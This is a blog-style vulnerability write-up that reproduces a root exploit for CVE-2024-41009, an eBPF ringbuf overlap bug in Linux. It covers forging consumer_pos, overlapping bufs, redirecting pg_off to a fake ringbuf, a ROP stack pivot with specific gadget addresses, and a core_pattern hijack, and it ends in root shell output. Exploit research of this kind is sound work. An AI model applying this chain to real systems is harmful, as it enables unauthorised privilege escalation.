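CVE-2024-41009 is a buffer-overlapping bug in the eBPF ringbuf map that can be exploited for privilege escalation. Kernel versions v5.8 through v6.9 are affected. A ringbuf sets up shared memory between the kernel and user space in a classic producer-consumer model: when the kernel is the producer, eBPF programs inside the kernel write into the shared memory and user space reads it as the consumer. The bug lies in this mode, where user space is the consumer. Inside the kernel, a bpf ringbuf map is represented by struct bpf_ringbuf, whose consumer_pos field is writable from user space. The kernel does not validate that field carefully before using it, so the same region of memory can end up belonging to two different bufs at once.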
How the vulnerability works
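First, the memory layout of bpf_ringbuf: consumer_pos, producer_pos and data are all page aligned. Everything before bpf_ringbuf->consumer_pos takes one page, consumer_pos takes one page, producer_pos and pending_pos share one page, and only then does the data area begin.
A 16K ringbuf therefore uses 7 pages (page 1: the fields before consumer_pos; page 2: consumer_pos; page 3: producer_pos; then 4 data pages for the 16K). The consumer_pos page can be mmap'ed writable into user space (ringbuf_map_mmap_kern).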
struct bpf_ringbuf {
    wait_queue_head_t waitq;
    struct irq_work work;
    u64 mask;
    struct page **pages;
    int nr_pages;
    spinlock_t spinlock ____cacheline_aligned_in_smp;
    atomic_t busy ____cacheline_aligned_in_smp;
    unsigned long consumer_pos __aligned(PAGE_SIZE); // read-write from user space
    unsigned long producer_pos __aligned(PAGE_SIZE); // read-only from user space
    unsigned long pending_pos;
    char data[] __aligned(PAGE_SIZE);
};
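- work - contains the function pointer func, which is called when a ringbuf buf is released
- consumer_pos - marks the read position and can be mapped into user space on its own. mmap operates on memory regions (VMAs), which are page aligned, so although this field is only 8 bytes it occupies a whole page
- data - the data area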
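The page arithmetic above can be checked with a small user-space mock. This is only a sketch: struct ringbuf_layout is a hypothetical stand-in in which a 64-byte head array replaces the real waitq, work, mask, pages and lock fields (all that matters is that they fit in one page), and a 4096-byte page is assumed.

```c
#include <assert.h>
#include <stddef.h>

#define PAGE_SIZE 4096UL /* assumed page size */

/* Hypothetical stand-in for struct bpf_ringbuf; only the alignment matters. */
struct ringbuf_layout {
    char head[64]; /* placeholder for waitq, work, mask, pages, locks */
    unsigned long consumer_pos __attribute__((aligned(4096)));
    unsigned long producer_pos __attribute__((aligned(4096)));
    unsigned long pending_pos;
    char data[] __attribute__((aligned(4096)));
};

/* consumer_pos opens the second page, so it can be mmap'ed on its own. */
static_assert(offsetof(struct ringbuf_layout, consumer_pos) == 4096,
              "consumer_pos must start a page");

/* Number of metadata pages in front of the data area. */
static unsigned long meta_pages(void)
{
    return offsetof(struct ringbuf_layout, data) / PAGE_SIZE;
}

/* Physical pages backing a ring that holds data_size bytes of data. */
static unsigned long physical_pages(unsigned long data_size)
{
    return meta_pages() + data_size / PAGE_SIZE;
}
```

Under these assumptions, meta_pages() is 3 and physical_pages(16 * 1024) is 7, which matches the count given above.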
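Bufs are allocated from the data area. The first 8 bytes of each buf are its header, a bpf_ringbuf_hdr, which neither eBPF nor user space can modify directly. The allocator skips it by returning (void *)hdr + BPF_RINGBUF_HDR_SZ: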
struct bpf_ringbuf_hdr {
    u32 len;
    u32 pg_off;
};
The data pages are mapped twice: the second half of the data virtual address range points to the same physical pages as the first half.
bpf_ringbuf_area_alloc
    /* Each data page is mapped twice to allow "virtual"
     * continuous read of samples wrapping around the end of ring
     * buffer area:
     * ------------------------------------------------------
     * | meta pages |  real data pages  |  same data pages  |
     * ------------------------------------------------------
     * |            | 1 2 3 4 5 6 7 8 9 | 1 2 3 4 5 6 7 8 9 |
     * ------------------------------------------------------
     * |            | TA             DA | TA             DA |
     * ------------------------------------------------------
     *                               ^^^^^^^
     *                                  |
     * Here, no need to worry about special handling of wrapped-around
     * data due to double-mapped data pages. This works both in kernel and
     * when mmap()'ed in user-space, simplifying both kernel and
     * user-space implementations significantly.
     */
    array_size = (nr_meta_pages + 2 * nr_data_pages) * sizeof(*pages);
    pages = bpf_map_area_alloc(array_size, numa_node);
    if (!pages)
        return NULL;

    for (i = 0; i < nr_pages; i++) {
        page = alloc_pages_node(numa_node, flags, 0);
        if (!page) {
            nr_pages = i;
            goto err_free_pages;
        }
        pages[i] = page;
        if (i >= nr_meta_pages)
            pages[nr_data_pages + i] = page;
    }

    rb = vmap(pages, nr_meta_pages + 2 * nr_data_pages,
              VM_MAP | VM_USERMAP, PAGE_KERNEL);
    if (rb) {
        kmemleak_not_leak(pages);
        rb->pages = pages;
        rb->nr_pages = nr_pages;
        return rb;
    }
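The effect of the double mapping is easy to see from user space. The following is a rough analogue, not the kernel's vmap path: it assumes Linux with memfd_create available, and the helper names map_twice and wrap_demo are made up for this illustration. The same 4 pages are mapped back to back, so a write that runs past the end of the first copy lands at the start of the ring.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Map the same `size` bytes twice, back to back (size must be page aligned).
 * Returns the base of the 2 * size window, or NULL on failure. */
static unsigned char *map_twice(size_t size)
{
    int fd = memfd_create("ring-demo", 0); /* anonymous in-memory file */
    if (fd < 0)
        return NULL;
    if (ftruncate(fd, (off_t)size) < 0) {
        close(fd);
        return NULL;
    }
    /* Reserve a contiguous window first, then overlay both halves on it. */
    unsigned char *base = mmap(NULL, 2 * size, PROT_NONE,
                               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED) {
        close(fd);
        return NULL;
    }
    void *lo = mmap(base, size, PROT_READ | PROT_WRITE,
                    MAP_SHARED | MAP_FIXED, fd, 0);
    void *hi = mmap(base + size, size, PROT_READ | PROT_WRITE,
                    MAP_SHARED | MAP_FIXED, fd, 0);
    close(fd); /* the mappings keep the memory alive */
    if (lo == MAP_FAILED || hi == MAP_FAILED) {
        munmap(base, 2 * size);
        return NULL;
    }
    return base;
}

/* Returns 1 if a write crossing the end of the ring shows up at its start,
 * 0 if it does not, -1 if the mapping could not be set up. */
static int wrap_demo(void)
{
    size_t size = (size_t)sysconf(_SC_PAGESIZE) * 4;
    unsigned char *ring = map_twice(size);
    if (!ring)
        return -1;
    memcpy(ring + size - 4, "ABCDEFGH", 8); /* straddles the boundary */
    int ok = memcmp(ring, "EFGH", 4) == 0 &&
             memcmp(ring + size, "EFGH", 4) == 0;
    munmap(ring, 2 * size);
    return ok;
}
```

The same aliasing is what later lets a chunk that extends past the end of the data area reach the bytes at its beginning.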
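Reproducing the exploit
In summary, the whole exploit goes as follows:
- Tamper with consumer_pos
- Have eBPF allocate overlapping memory
- Use the overlap to tamper with the pg_off field of a buf hdr
- Release the buf, so that a fake bpf_ringbuf is derived from pg_off
- Execute the fake func
- Tamper with core_pattern
- Crash on purpose to trigger a core dump and run an arbitrary command
- Get the flag and a root bash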
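Tampering with consumer_pos from user space
Create a 16K ringbuf, map the consumer_pos page into user space, and set consumer_pos to 0x3000. Then have eBPF allocate two bufs of size 0x3000. Since the total size is only 0x4000, the second allocation would normally fail. But because consumer_pos has already been changed to 0x3000, the check is bypassed: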
__bpf_ringbuf_reserve
    if (new_prod_pos - cons_pos > rb->mask) {
        spin_unlock_irqrestore(&rb->spinlock, flags);
        return NULL;
    }
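To make the arithmetic concrete, here is a minimal user-space model of that check. It is a sketch, not kernel code: struct ring_model and both function names are hypothetical, locking is left out, and the only other rule modelled is that the kernel rounds size + BPF_RINGBUF_HDR_SZ up to a multiple of 8.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define HDR_SZ 8u /* BPF_RINGBUF_HDR_SZ */

/* Hypothetical model of the three fields the check looks at. */
struct ring_model {
    uint64_t mask;         /* data size - 1 */
    uint64_t consumer_pos; /* writable from user space */
    uint64_t producer_pos;
};

/* Mirrors the check quoted above; advances producer_pos on success. */
static bool model_reserve(struct ring_model *rb, uint64_t size)
{
    uint64_t len = (size + HDR_SZ + 7) & ~7ULL;
    uint64_t new_prod_pos = rb->producer_pos + len;

    if (new_prod_pos - rb->consumer_pos > rb->mask)
        return false; /* ring looks full */
    rb->producer_pos = new_prod_pos;
    return true;
}

/* Reserve two 0x3000-byte bufs from a 16K ring with a given consumer_pos.
 * Returns true only if both reservations pass the check. */
static bool two_reserves_succeed(uint64_t consumer_pos)
{
    struct ring_model rb = {
        .mask = 0x4000 - 1,
        .consumer_pos = consumer_pos,
        .producer_pos = 0,
    };

    return model_reserve(&rb, 0x3000) && model_reserve(&rb, 0x3000);
}
```

With consumer_pos left at 0 the second reservation sees 0x6010 - 0 > 0x3fff and fails. With consumer_pos forged to 0x3000 it sees 0x6010 - 0x3000 = 0x3010, which is within the mask, so both succeed.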
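Allocating overlapping memory chunks
With a 16K buf, nr_data_pages = 4, so [0, 0x1000] and [0x4000, 0x5000] are the same page and offset 0x4000 points at chunk A's hdr. Two chunks are allocated: A at [0, 0x3008] and B at [0x3008, 0x6010]. eBPF can access [0x3010, 0x6010], so A's hdr metadata can be modified through offset 0x4000 inside B. When a buf is released, bpf_ringbuf_restore_from_rec computes the address of the ringbuf from the pg_off stored in the hdr.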
bpf_ringbuf_discard
  bpf_ringbuf_commit
    struct bpf_ringbuf *rb = bpf_ringbuf_restore_from_rec(hdr);
      unsigned long off = (unsigned long)hdr->pg_off << PAGE_SHIFT;
      return (void*)((addr & PAGE_MASK) - off);
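For the overlap itself, it helps to work out exactly where chunk A's header shows up inside chunk B. The sketch below does that arithmetic under the numbers used in this post; the function names are hypothetical and it assumes the ring size is a power of two.

```c
#include <assert.h>
#include <stdint.h>

#define HDR_SZ 8u /* BPF_RINGBUF_HDR_SZ */

/* Offset into the data area that a ring position lands on. */
static uint64_t ring_off(uint64_t pos, uint64_t ring_size)
{
    return pos & (ring_size - 1);
}

/* Offset inside chunk B's payload that aliases chunk A's header,
 * or -1 if B's payload does not cover the whole header. */
static int64_t alias_in_payload(uint64_t a_pos, uint64_t b_pos,
                                uint64_t b_len, uint64_t ring_size)
{
    uint64_t payload_start = b_pos + HDR_SZ;
    uint64_t payload_end = b_pos + b_len; /* exclusive */
    /* First position at or after payload_start that maps to the same
     * data offset as a_pos (the double mapping makes them one byte). */
    uint64_t delta = (ring_off(a_pos, ring_size) -
                      ring_off(payload_start, ring_size)) & (ring_size - 1);
    uint64_t alias = payload_start + delta;

    if (alias + HDR_SZ > payload_end)
        return -1;
    return (int64_t)(alias - payload_start);
}
```

For A at position 0 and B at position 0x3008 with length 0x3008, the result is 0xff0: the eBPF program reaches A's header at byte 0xff0 of B's payload, and pg_off, the second u32 of the header, at 0xff4.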
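Using the second buf to tamper with the first buf's hdr->pg_off
From the ringbuf memory layout above, the first buf, which sits at the start of data, is 2 pages away from consumer_pos. So the first buf's hdr->pg_off can be rewritten to 2. When bpf_ringbuf_commit then derives the ringbuf from the buf's hdr, the ringbuf it computes is memory fully controlled by user space: the consumer_pos page. That page now serves as the fake bpf_ringbuf.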
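The redirection can be replayed with plain integer arithmetic. In this sketch restore_rb mirrors the two lines of bpf_ringbuf_restore_from_rec quoted earlier; EXAMPLE_RB is a made-up kernel address used purely for illustration, and 4K pages are assumed.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SHIFT 12
#define PAGE_MASK  (~((1ULL << PAGE_SHIFT) - 1))

/* Made-up ringbuf base address, for illustration only. */
#define EXAMPLE_RB 0xffffc90000100000ULL

/* Same computation as bpf_ringbuf_restore_from_rec, on plain integers. */
static uint64_t restore_rb(uint64_t hdr_addr, uint32_t pg_off)
{
    uint64_t off = (uint64_t)pg_off << PAGE_SHIFT;

    return (hdr_addr & PAGE_MASK) - off;
}

/* Address of the first buf's header: data starts 3 pages into the ringbuf. */
static uint64_t first_hdr_addr(uint64_t rb)
{
    return rb + 3 * (1ULL << PAGE_SHIFT);
}
```

With the genuine pg_off of 3, restore_rb(first_hdr_addr(EXAMPLE_RB), 3) gives back EXAMPLE_RB. With pg_off forged to 2 it gives EXAMPLE_RB + 0x1000, which is the consumer_pos page.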
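Looking at struct bpf_ringbuf again, it contains an irq_work member, work, whose func field is a function pointer. Pointing the fake bpf_ringbuf's func at a ROP gadget is enough to execute arbitrary code.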
struct irq_work {
    struct __call_single_node node;
    void (*func)(struct irq_work *);
    struct rcuwait irqwait;
};
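Building the ROP chain
func is at offset 0x28 in struct bpf_ringbuf. Since the ringbuf has already been redirected to the consumer_pos page, it is enough to place a stack pivot gadget at consumer_pos+0x28. When func is called, the ROP chain takes over the control flow.
In my self-compiled vmlinux I could not find a stack pivot gadget as convenient as the one in the original PoC: push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret
When func is executed via irq_work_queue(&rb->work), rbx and rdi both hold the address of work, i.e. ringbuf+0x18: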
(gdb) p/x (int)&(((struct bpf_ringbuf*)0)->work)
$2 = 0x18
I could not find a stack pivot gadget that skips past +0x20 once rsp has been set. The only one I found is 0xffffffff8225c149, and after it executes rsp points at +0x20.
0xffffffff8225c149 <inet_diag_msg_common_fill+105>: push %rbx
0xffffffff8225c14a <inet_diag_msg_common_fill+106>: and %bl,0x41(%rbx)
0xffffffff8225c14d <inet_diag_msg_common_fill+109>: pop %rsp
0xffffffff8225c14e <inet_diag_msg_common_fill+110>: pop %rbp
0xffffffff8225c14f <inet_diag_msg_common_fill+111>: ret
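To see why rsp ends up at +0x20, the gadget can be stepped through on paper. The sketch below does the same with offsets into the fake bpf_ringbuf page instead of real addresses; struct regs and run_pivot are hypothetical names, and the byte store done by the and instruction at rbx+0x41 is ignored because it does not affect the stack.

```c
#include <assert.h>
#include <stdint.h>

#define WORK_OFF 0x18u /* offset of work in struct bpf_ringbuf (gdb output above) */

/* Register state after the gadget; rsp is an offset into the fake page. */
struct regs {
    uint64_t rsp;
    uint64_t rbp;
    uint64_t rip;
};

/* Step through "push rbx; pop rsp; pop rbp; ret" with rbx pointing at
 * byte offset rbx_off of the fake page (given as 64-bit slots). */
static struct regs run_pivot(const uint64_t *page, uint64_t rbx_off)
{
    struct regs r;

    r.rsp = rbx_off;         /* push rbx; pop rsp: rsp = rbx */
    r.rbp = page[r.rsp / 8]; /* pop rbp consumes the slot at +0x18 */
    r.rsp += 8;
    r.rip = page[r.rsp / 8]; /* ret takes its target from +0x20 */
    r.rsp += 8;
    return r;
}
```

Calling run_pivot(page, WORK_OFF) shows that the next gadget address is read from the slot at +0x20 and that rsp is at +0x28 afterwards, so whatever sits at +0x20 decides where execution continues.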
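Putting an arbitrary other gadget at +0x20 did not work. +0x20 is bpf_ringbuf.work.node.a_flags. With 0xffff there, the bug was not triggered: no crash and no success either. With 0xff22, the kernel panicked on the faulting address 0xff22, which shows that a low byte of 0x22 gets through. The reason is the flag check in irq_work_claim, if (oflags & IRQ_WORK_PENDING). So I chose a gadget whose address ends in 0x22, 0xffffffff820df722:
pop r13, pop r14, pop rbp, ret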
(gdb) p/x (int)&(((struct bpf_ringbuf*)0)->work.node.a_flags)
$4 = 0x20
0x22 == CSD_TYPE_IRQ_WORK(0x20) | IRQ_WORK_BUSY (0x02);
IRQ_WORK_PENDING = 0x1
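The three experiments above (0xffff, 0xff22 and a gadget address ending in 0x22) can be replayed with a small model of the flag handling. This is a simplified, non-atomic sketch based on my reading of kernel/irq_work.c: the claim step ORs IRQ_WORK_CLAIMED | CSD_TYPE_IRQ_WORK into a_flags and gives up if PENDING was already set, and PENDING is cleared again before func is called. Only the PENDING check and the constants come from this post; the rest, including the name model_irq_work, is an assumption.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define IRQ_WORK_PENDING  0x01u
#define IRQ_WORK_BUSY     0x02u
#define IRQ_WORK_CLAIMED  (IRQ_WORK_PENDING | IRQ_WORK_BUSY)
#define CSD_TYPE_IRQ_WORK 0x20u

/* Returns true if func would be called; *at_call then holds a_flags as it
 * looks at that moment, i.e. the low 32 bits the pivot's ret will use. */
static bool model_irq_work(uint32_t a_flags, uint32_t *at_call)
{
    uint32_t oflags = a_flags; /* value before the claim */

    a_flags |= IRQ_WORK_CLAIMED | CSD_TYPE_IRQ_WORK;
    if (oflags & IRQ_WORK_PENDING)
        return false; /* treated as already queued: func never runs */
    a_flags &= ~IRQ_WORK_PENDING; /* cleared before func is called */
    *at_call = a_flags;
    return true;
}
```

In this model 0xffff is rejected outright because bit 0 is set, which would explain the run with neither a crash nor success. 0xff22 and 0x820df722 pass through unchanged because their low byte already contains 0x22 and has bit 0 clear. A value ending in 0x00 would be turned into one ending in 0x22, so the ret would no longer land on the intended gadget.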
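Next, the ROP chain changes core_pattern to the memfd path |/proc/%P/fd/666 %P, and the exploit copies itself into that memfd. The exploit then crashes on purpose to trigger a core dump, and the kernel runs the exploit binary itself with root privileges, which completes the privilege escalation.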
Reproduction:
All ROP gadgets must lie within [_stext, _etext]; otherwise an NX fault is triggered:
[ 81.766165] kernel tried to execute NX-protected page - exploit attempt? (uid: 1000)
[ 81.792896] BUG: unable to handle page fault for address: ffffffff8299a052
[ 81.810767] #PF: supervisor instruction fetch in kernel mode
[ 81.823853] #PF: error_code(0x0011) - permissions violation
[ 81.836248] PGD 3c46067 P4D 3c46067 PUD 3c47063 PMD 80000000028001e1
[ 81.851043] Oops: 0011 [#1] PREEMPT SMP PTI
test:
$ ./poc
Hello World!
try to wait core
[ 95.464768] BUG: scheduling while atomic: poc/354/0x00010002
[ 95.478632] Modules linked in:
sockets[0]: 5, socket[1]: 6
[ 95.486469] Preemption disabled at:
[ 95.486474] [<ffffffff81310e23>] irq_work_queue+0x23/0x50
[ 95.508029] CPU: 1 PID: 354 Comm: poc Not tainted 6.3.0 #93
[ 95.526632] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 95.599172] Call Trace:
[ 95.677927] ------------[ cut here ]------------
[ 95.683175] Voluntary context switch within RCU read-side critical section!
[ 95.683816] WARNING: CPU: 1 PID: 354 at kernel/rcu/tree_plugin.h:318 rcu_note_context_switch+0x62c/0x690
[ 95.713178] Modules linked in:
[ 95.718262] CPU: 1 PID: 354 Comm: poc Tainted: G W 6.3.0 #93
[ 95.735521] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 95.752900] RIP: 0010:rcu_note_context_switch+0x62c/0x690
[ 95.762138] Code: 00 00 00 00 0f 85 0d fd ff ff 49 89 8c 24 a0 00 00 00 e9 00 fd ff ff 48 c7 c7 a8 24 27 83 c6 05 75 08 ce 02 01 e8 a4 82 f6 ff <0f> 0b e9 3b fa ff ff 49 83 bc 24 98 00 00 00 00 49 8b 84 24 a0 00
[ 95.793147] RSP: 0018:ffffc900009adf40 EFLAGS: 00010086
[ 95.801582] RAX: 0000000000000000 RBX: ffff88813bcb3700 RCX: 0000000000000000
[ 95.814821] RDX: 0000000000000003 RSI: 0000000000000027 RDI: 00000000ffffffff
[ 95.828898] RBP: 0000000000000000 R08: 00000000ffffdfff R09: 0000000000000001
[ 95.840645] R10: 00000000ffffdfff R11: ffffffff83c7afa0 R12: ffff88813bcb2880
[ 95.854500] R13: ffff888102acb240 R14: 0000000000000000 R15: 0000000000000000
[ 95.871507] FS: 0000000000da2380(0000) GS:ffff88813bc80000(0000) knlGS:0000000000000000
[ 95.890278] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 95.901485] CR2: 00000000004b9000 CR3: 0000000102a02000 CR4: 0000000000050ee0
[ 95.918447] Call Trace:
[ 95.925747] ---[ end trace 0000000000000000 ]---
[ 96.027876] poc[355]: segfault at 0 ip 000000000040248d sp 00007ffc781827d0 error 6 in poc[401000+89000] likely on CPU 1 (core 1, socket 0)
[ 96.075993] Code: df e8 97 fb 01 00 ba 10 00 00 00 4c 89 ee 48 89 ef e8 47 ec ff ff 85 c0 0f 85 4f ff ff ff 48 8d 3d d6 7b 08 00 e8 03 46 00 00 <48> c7 04 25 00 00 00 00 00 00 00 00 0f 0b 0f 1f 44 00 00 f3 0f 1e
check core: /proc/sys/kernel/core_pattern
Root shell !!
FLAG{test-by-hxqu}
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@wintermute:/#
root@wintermute:/# whoami
root
Environment
Kernel version used: 6.3, commit 457391b0380335d5e9a5babdec90ac53928b23b4
Steps: buf-overlapping -> buf metadata -> ringbuf meta -> function pointer -> stack pivot -> ROP
Full set of reproduction files: link
Document information
- Author: seamaner
- Link: https://seamaner.github.io/2025/04/13/CVE-2024-41009/
- License: free to repost, non-commercial, no derivatives, attribution required (Creative Commons 3.0 license)